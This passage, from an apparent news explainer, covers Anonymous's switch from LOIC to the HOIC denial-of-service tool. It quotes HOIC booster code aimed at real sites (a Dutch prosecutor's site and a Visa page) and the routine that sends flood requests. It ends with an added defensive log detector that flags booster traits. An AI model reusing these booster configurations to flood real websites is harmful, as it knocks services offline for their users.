Most members of Anonymous would prefer to stay, well, anonymous. But as the group has engaged in increasingly high-profile attacks on government and corporate websites, doing so effectively and staying out of harm's way have become an ever-growing challenge. To protect itself, the group has altered its tactics over the past year to both increase the firepower of its attacks and shield members from the prying eyes of law enforcement.

In late 2011, members of Anonymous began to step away from their most well-known weapon for distributed denial of service attacks. While some in the group continued to try to get enthusiastic followers (or unwary webpage visitors) to use a Web browser version of the Low Orbit Ion Cannon attack tool, use of LOIC had led to the arrests of members of Anonymous and LulzSec last summer. More cautious and technically skilled Anons started to use a collection of other tools and security practices to both step up attacks and hide themselves from being tracked. A message spread through Anonymous’ IRC channels spells it out: “Do NOT use LOIC.”

How Denial of Service attacks work

Denial-of-service (DoS) attacks are aimed at blocking access by outside users to a website or other Internet service. They usually do this either by overwhelming one or more of the resources of the server that hosts the website or application with traffic, or by disrupting a network service that the server depends on. The most common of these are "flood" brute-force attacks that aim to overwhelm a server's network connections with a huge volume of requests, consuming the bandwidth of the server's connection or filling up the memory associated with the server application's network connections, rendering the service unreachable. Other types of attacks are crafted to go after the applications themselves, using specially formed network requests to exploit a function of the server's software to crash it or make it stop responding. A distributed denial of service (DDoS) attack spreads the malicious requests to the server across many source computers—often by using a "botnet" controlling hundreds of infected computers, or in the case of Anonymous, by coordinating the efforts of tens or hundreds of volunteer "activists" to launch attacks.

The attacks on the websites of the Justice Department and others in the wake of the takedown of Megaupload.com were the first demonstration of the power of LOIC’s successor—a DDoS tool called the High Orbit Ion Cannon.

HOIC isn't exactly rocket science. At its core, it is essentially a simple script for launching HTTP POST and GET requests at a targeted server, wrapped in a "lulz" friendly graphical interface. According to the documentation, it can be used to open up 256 attack sessions simultaneously—either targeting a single server, or going after multiple targets. The user can control the number of threads used per attack.

This rocket needs boosters

The code itself isn't that sophisticated. HOIC is written in Basic—or, to be more accurate, Real Software's Real Basic, the cross-platform version of the language originally developed for the Mac. The main power of HOIC is that it can be customized for each attack target relatively easily without having to know how to code, using "boosters," modules with additional bits of Basic code that are interpreted at runtime.

HOIC’s boosters are used to tailor the HTTP requests sent by HOIC to the target for a specific type of attack. ”HOIC is pretty useless,” the documentation file that comes with the code says, “unless it is used in combination with ‘Boosters.’” And that's putting it mildly—the attack code is generated based completely on what's in the booster file. When an attack is launched, HOIC compiles the booster to create the HTTP headers to be sent, and sets the mode of the attack.

One approach commonly used in boosters is to create randomized requests in an attempt to defeat any content delivery network (CDN) or caching used to shield the server from traffic spikes. Some boosters use lists of URLs within a target site, appending them to a table in memory to be used by the attack thread:

    // populate rotating urls
    randURLs.Append "http://www.om.nl/"
    randURLs.Append "http://www.om.nl/onderwerpen/cybercrime/"

The script also can include a randomized list of user agents, referring sites and random headers that are fed into HTTP requests to make the requests look more legitimate:

    useragents.Append " Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
    useragents.Append " Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
    referers.Append " http://www.google.com/?q=" +URL

The booster script can also include parameters to set the volume of the attack, and to switch between GET and POST requests. For example, here’s the booster set up to attack a dynamic part of Visa’s webpage, using POST, complete with a form submission to the target page:

    UsePost = true
    Headers.Append(" User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.12) Gecko/20101027 Firefox/3.6.12" )
    Headers.Append(" Keep-Alive: 115")
    Headers.Append("Proxy-Connection: keep-alive")
    Headers.Append(" Referer: http://visa.via.infonow.net/locator/global/AdvancedSearchAction.do")
    Headers.Append(" Cookie: JSESSIONID=5D2E604F487FB5AC9DBF9A1FDEA7D86A.fta-web3" )
    URL = "http://visa.via.infonow.net/locator/global/AdvancedSearchAction.do"
    PostBuffer = "newSearch=true&airport=&pageid=adv&filteredNameSubmit=false&LOC=en_US&country=CHE&street1=2353464756867867876886786777777777777777777777777777786&building=&city=aaaaaaaaaaaaaaa&initialSearchName=&mapAndList=mapAndList&x=27&y=9"

While the scripts themselves can get fairly sophisticated in how they’re configured, a generic booster file distributed with HOIC makes it fairly simple for would-be DDoSers to build a custom booster for whatever target has drawn their ire at the moment and distribute it via a shared document site like PasteBin, Google Documents, or an Etherpad site. For example, when a hungry Anon got upset about a late pizza delivery on Valentine’s Day, he quickly shared a list of Web addresses to start an impromptu DDoS on Pizza Hut.

The actual code that runs the attacks is executed as threads by a set of timers. ObjTarget.SendAttack is pretty straightforward:

    'Creating the socket request
    Dim httpObj as HTTPSocket
    Dim i as integer
    Dim reqSize as integer = 0
    httpObj = New HTTPSocket
    ' Adding the headers generated by the booster
    for i = 0 to Headers.Ubound
      reqSize = reqSize + Headers(i).Len
      httpObj.SetRequestHeader(Headers(i).Left(Headers(i).InStr(":")-1), Headers(i).Mid(Headers(i).InStr(":")+1, Headers(i).Len - Headers(i).InStr(":")))
    Next
    'For attacks where POST has been chosen as the type of HTTP request
    if(UsePost) then
      reqSize = reqSize + PostBuffer.Len + 4 ' POST
      httpObj.SetPostContent(PostBuffer, "application/x-www-form-urlencoded")
      httpObj.Post URL
    'For GET based attacks
    else
      reqSize = reqSize + 3 ' GET
      httpObj.Get URL
    end if
    'Tracking how much data has been sent to the target
    TotalBytesSent = TotalBytesSent + reqSize
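The booster traits described above (a Referer built as "http://www.google.com/?q=" plus the target's own URL, and a single client rotating user agents and paths across a burst) are visible in an ordinary web server access log. The following detector is an added example written for this article, not part of HOIC or of any published tool; it parses combined-format log lines (the sample lines are constructed, with RFC 5737 documentation addresses) and flags source IPs that show those traits.

```python
import re
from collections import defaultdict

# "combined" log format: ip ident user [time] "METHOD path proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

# Constructed sample: 203.0.113.7 sends four requests in two seconds, rotating user agents and
# paths and carrying the booster-style Referer; two ordinary visitors are mixed in.
SAMPLE_LOG = """\
203.0.113.7 - - [14/Feb/2012:21:03:01 +0000] "GET / HTTP/1.1" 200 5120 "http://www.google.com/?q=http://www.example.org/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
198.51.100.20 - - [14/Feb/2012:21:03:01 +0000] "GET /about HTTP/1.1" 200 2210 "http://www.example.org/" "Mozilla/5.0 (X11; Linux x86_64; rv:10.0) Gecko/20100101 Firefox/10.0"
203.0.113.7 - - [14/Feb/2012:21:03:01 +0000] "GET /news/ HTTP/1.1" 200 7100 "http://www.google.com/?q=http://www.example.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
203.0.113.7 - - [14/Feb/2012:21:03:02 +0000] "POST /search HTTP/1.1" 200 900 "http://www.google.com/?q=http://www.example.org/" "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.7.62 Version/11.01"
198.51.100.21 - - [14/Feb/2012:21:03:02 +0000] "GET /news/ HTTP/1.1" 200 7100 "http://www.google.com/search?q=example+news" "Mozilla/5.0 (X11; Linux x86_64; rv:10.0) Gecko/20100101 Firefox/10.0"
203.0.113.7 - - [14/Feb/2012:21:03:02 +0000] "GET /contact HTTP/1.1" 200 1300 "http://www.google.com/?q=http://www.example.org/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
"""

def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def booster_referer(referer):
    """Referer of the form "http://www.google.com/?q=" + a full URL: the generic booster's
    template, which a real Google search result page never produces."""
    return referer.lstrip().startswith("http://www.google.com/?q=http")

def flag_sources(lines, min_requests=4, min_agents=3):
    """Group requests by source IP and return {ip: [indicators]} for suspicious sources.
    "ua_rotation" means one client presented several different browsers within the burst."""
    per_ip = defaultdict(lambda: {"n": 0, "agents": set(), "referer_hits": 0})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        s = per_ip[rec["ip"]]
        s["n"] += 1
        s["agents"].add(rec["ua"])
        s["referer_hits"] += booster_referer(rec["referer"])
    flagged = {}
    for ip, s in per_ip.items():
        indicators = []
        if s["referer_hits"]:
            indicators.append("booster_referer")
        if s["n"] >= min_requests and len(s["agents"]) >= min_agents:
            indicators.append("ua_rotation")
        if indicators:
            flagged[ip] = indicators
    return flagged
```

Run over a real log, the thresholds should be tuned to the site's normal traffic and combined with a per-second rate check, since a proxy or NAT gateway legitimately presents many user agents from one address.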

But HOIC isn’t the only tool that Anons are promoting.